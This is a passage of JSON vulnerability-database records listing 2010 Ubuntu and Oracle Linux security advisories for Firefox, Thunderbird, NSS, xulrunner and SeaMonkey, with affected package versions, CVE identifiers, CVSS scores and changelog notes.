"8.04", "packageVersion": "2.0.0.24+build1+nobinonly-0ubuntu0.8.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "3.0.10+build1+nobinonly-0ubuntu0.10.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "3.1.6+build1+nobinonly-0ubuntu0.10.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}], "description": "USN-1011-1 fixed a vulnerability in Firefox. This update provides the corresponding update for Thunderbird.\n\nOriginal advisory details:\n\nMorten Krakvik discovered a heap-based buffer overflow in Firefox. If a user were tricked into navigating to a malicious site, an attacker could cause a denial of service or possibly execute arbitrary code as the user invoking the program.", "edition": 3, "reporter": "Ubuntu", "published": "2010-10-28T00:00:00", "title": "Thunderbird vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3765"], "modified": "2010-10-28T00:00:00", "id": "USN-1011-2", "href": "https://usn.ubuntu.com/1011-2/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:42:16", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "i386", "packageFilename": "xulrunner-1.9.2.11-2.0.1.el5.i386.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "i386", "packageFilename": "xulrunner-1.9.2.11-2.0.1.el5.i386.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "x86_64", "packageFilename": "nss-3.12.8-1.0.1.el4.x86_64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "i386", "packageFilename": "nss-tools-3.12.8-1.0.1.el5.i386.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "x86_64", "packageFilename": "xulrunner-devel-1.9.2.11-2.0.1.el5.x86_64.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "i386", "packageFilename": "xulrunner-devel-1.9.2.11-2.0.1.el5.i386.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "i386", "packageFilename": "xulrunner-devel-1.9.2.11-2.0.1.el5.i386.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "ia64", "packageFilename": "nss-devel-3.12.8-1.0.1.el4.ia64.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "ia64", "packageFilename": "xulrunner-1.9.2.11-2.0.1.el5.ia64.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "i386", "packageFilename": "nss-tools-3.12.8-1.0.1.el4.i386.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-2.0.1.el4", "arch": "ia64", "packageFilename": "firefox-3.6.11-2.0.1.el4.ia64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "x86_64", "packageFilename": "nss-tools-3.12.8-1.0.1.el5.x86_64.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-2.0.1.el4", "arch": "src", "packageFilename": "firefox-3.6.11-2.0.1.el4.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-2.0.1.el4", "arch": "src", "packageFilename": "firefox-3.6.11-2.0.1.el4.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-2.0.1.el4", "arch": "src", "packageFilename": "firefox-3.6.11-2.0.1.el4.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "i386", "packageFilename": "nss-3.12.8-1.0.1.el4.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "i386", "packageFilename": "nss-3.12.8-1.0.1.el4.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "i386", "packageFilename": "nss-3.12.8-1.0.1.el4.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "i386", "packageFilename": "nss-devel-3.12.8-1.0.1.el5.i386.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "i386", "packageFilename": "nss-devel-3.12.8-1.0.1.el5.i386.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "ia64", "packageFilename": "nss-devel-3.12.8-1.0.1.el5.ia64.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.6.11-2.0.1.el5", "arch": "src", "packageFilename": "firefox-3.6.11-2.0.1.el5.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.6.11-2.0.1.el5", "arch": "src", "packageFilename": "firefox-3.6.11-2.0.1.el5.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.6.11-2.0.1.el5", "arch": "src", "packageFilename": "firefox-3.6.11-2.0.1.el5.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.6.11-2.0.1.el5", "arch": "i386", "packageFilename": "firefox-3.6.11-2.0.1.el5.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.6.11-2.0.1.el5", "arch": "i386", "packageFilename": "firefox-3.6.11-2.0.1.el5.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "src", "packageFilename": "nss-3.12.8-1.0.1.el4.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "src", "packageFilename": "nss-3.12.8-1.0.1.el4.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "src", "packageFilename": "nss-3.12.8-1.0.1.el4.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "i386", "packageFilename": "nss-3.12.8-1.0.1.el5.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "i386", "packageFilename": "nss-3.12.8-1.0.1.el5.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "i386", "packageFilename": "nss-3.12.8-1.0.1.el5.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "x86_64", "packageFilename": "nss-tools-3.12.8-1.0.1.el4.x86_64.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "i386", "packageFilename": "nss-devel-3.12.8-1.0.1.el4.i386.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "x86_64", "packageFilename": "nss-devel-3.12.8-1.0.1.el5.x86_64.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-2.0.1.el4", "arch": "x86_64", "packageFilename": "firefox-3.6.11-2.0.1.el4.x86_64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "ia64", "packageFilename": "nss-tools-3.12.8-1.0.1.el4.ia64.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-2.0.1.el4", "arch": "i386", "packageFilename": "firefox-3.6.11-2.0.1.el4.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "ia64", "packageFilename": "nss-3.12.8-1.0.1.el4.ia64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.6.11-2.0.1.el5", "arch": "ia64", "packageFilename": "firefox-3.6.11-2.0.1.el5.ia64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "x86_64", "packageFilename": "nss-pkcs11-devel-3.12.8-1.0.1.el5.x86_64.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "ia64", "packageFilename": "nss-pkcs11-devel-3.12.8-1.0.1.el5.ia64.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "x86_64", "packageFilename": "xulrunner-1.9.2.11-2.0.1.el5.x86_64.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "ia64", "packageFilename": "nss-3.12.8-1.0.1.el5.ia64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "ia64", "packageFilename": "xulrunner-devel-1.9.2.11-2.0.1.el5.ia64.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "src", "packageFilename": "nss-3.12.8-1.0.1.el5.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "src", "packageFilename": "nss-3.12.8-1.0.1.el5.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "src", "packageFilename": "nss-3.12.8-1.0.1.el5.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "x86_64", "packageFilename": "nss-3.12.8-1.0.1.el5.x86_64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "ia64", "packageFilename": "nss-tools-3.12.8-1.0.1.el5.ia64.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.6.11-2.0.1.el5", "arch": "x86_64", "packageFilename": "firefox-3.6.11-2.0.1.el5.x86_64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "i386", "packageFilename": "nss-pkcs11-devel-3.12.8-1.0.1.el5.i386.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "3.12.8-1.0.1.el5", "arch": "i386", "packageFilename": "nss-pkcs11-devel-3.12.8-1.0.1.el5.i386.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "src", "packageFilename": "xulrunner-1.9.2.11-2.0.1.el5.src.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "src", "packageFilename": "xulrunner-1.9.2.11-2.0.1.el5.src.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.9.2.11-2.0.1.el5", "arch": "src", "packageFilename": "xulrunner-1.9.2.11-2.0.1.el5.src.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.12.8-1.0.1.el4", "arch": "x86_64", "packageFilename": "nss-devel-3.12.8-1.0.1.el4.x86_64.rpm", "packageName": "nss-devel", "operator": "lt"}], "description": "firefox:\n[3.6.11-2.0.1.el5]\n- Add firefox-oracle-default-prefs.js and firefox-oracle-default-bookmarks.html\n and remove the corresponding Red Hat ones\n[3.6.11-2]\n- Update to 3.6.11 Build 2\n[3.6.11-1]\n- Update to 3.6.11\nnss:\n[3.12.8-1.0.1.el5]\n- Update clean.gif in the nss-3.12.8-stripped.tar.bz2 tarball\n[3.12.8-1]\n- Update to 3.12.8\nxulrunner:\n[1.9.2.11-2.0.1.el5]\n- Added xulrunner-oracle-default-prefs.js and removed the corresponding\n RedHat one.\n[1.9.2.11-2]\n- Update to 1.9.2.11 Build 2\n[1.9.2.11-1]\n- Update to 1.9.2.11", "edition": 3, "reporter": "Oracle", "published": "2010-10-20T00:00:00", "title": "firefox security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3173", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "modified": "2010-10-20T00:00:00", "id": "ELSA-2010-0782", "href": "http://linux.oracle.com/errata/ELSA-2010-0782.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:38:25", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-devel-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-js-debugger-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-nspr-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-mail-1.0.9-64.0.1.el4.i386.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-js-debugger-1.0.9-64.0.1.el4.x86_64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-chat-1.0.9-64.0.1.el4.x86_64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "src", "packageFilename": "seamonkey-1.0.9-0.61.0.1.el3.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "src", "packageFilename": "seamonkey-1.0.9-0.61.0.1.el3.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-dom-inspector-1.0.9-64.0.1.el4.ia64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-chat-1.0.9-64.0.1.el4.ia64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-chat-1.0.9-64.0.1.el4.i386.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-nspr-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-js-debugger-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-1.0.9-64.0.1.el4.i386.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-chat-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "src", "packageFilename": "seamonkey-1.0.9-64.0.1.el4.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "src", "packageFilename": "seamonkey-1.0.9-64.0.1.el4.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "src", "packageFilename": "seamonkey-1.0.9-64.0.1.el4.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-1.0.9-64.0.1.el4.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-js-debugger-1.0.9-64.0.1.el4.ia64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-devel-1.0.9-64.0.1.el4.x86_64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nss-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nss-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-nss-devel-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-1.0.9-64.0.1.el4.ia64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-dom-inspector-1.0.9-64.0.1.el4.i386.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-mail-1.0.9-64.0.1.el4.ia64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-devel-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-chat-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-mail-1.0.9-64.0.1.el4.x86_64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "ia64", "packageFilename": "seamonkey-devel-1.0.9-64.0.1.el4.ia64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-js-debugger-1.0.9-64.0.1.el4.i386.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-nss-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "i386", "packageFilename": "seamonkey-devel-1.0.9-64.0.1.el4.i386.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-nspr-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nspr-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nspr-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nss-devel-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-mail-1.0.9-0.61.0.1.el3.x86_64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-64.0.1.el4", "arch": "x86_64", "packageFilename": "seamonkey-1.0.9-64.0.1.el4.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-mail-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.61.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.61.0.1.el3.i386.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}], "description": "[1.0.9-64.0.1.el4]\n- Added mozilla-oracle-default-prefs.js and mozilla-oracle-default-bookmarks.html\n and emoved corresponding RedHat ones\n[1.0.9-64.el4]\n- Added fixes from 1.9.1.14", "edition": 3, "reporter": "Oracle", "published": "2010-10-20T00:00:00", "title": "seamonkey security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3177", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3173", "CVE-2010-3182", "CVE-2010-3170"], "modified": "2010-10-20T00:00:00", "id": "ELSA-2010-0781", "href": "http://linux.oracle.com/errata/ELSA-2010-0781.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:48:21", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-31.0.1.el4", "arch": "ia64", "packageFilename": "thunderbird-1.5.0.12-31.0.1.el4.ia64.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-31.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-31.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-31.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-31.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-31.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-31.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-31.0.1.el4", "arch": "x86_64", "packageFilename": "thunderbird-1.5.0.12-31.0.1.el4.x86_64.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-31.0.1.el4", "arch": "i386", "packageFilename": "thunderbird-1.5.0.12-31.0.1.el4.i386.rpm", "packageName": "thunderbird", "operator": "lt"}], "description": "[1.5.0.12-31.0.1.el4]\n- Add thunderbird-oracle-default-prefs.js for errata rebuild and remove\n thunderbird-redhat-default-prefs.js\n Replaced clean.gif in tarball\n[1.5.0.12-31]\n- Added fixes from 1.9.1.14", "edition": 3, "reporter": "Oracle", "published": "2010-10-20T00:00:00", "title": "thunderbird security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": 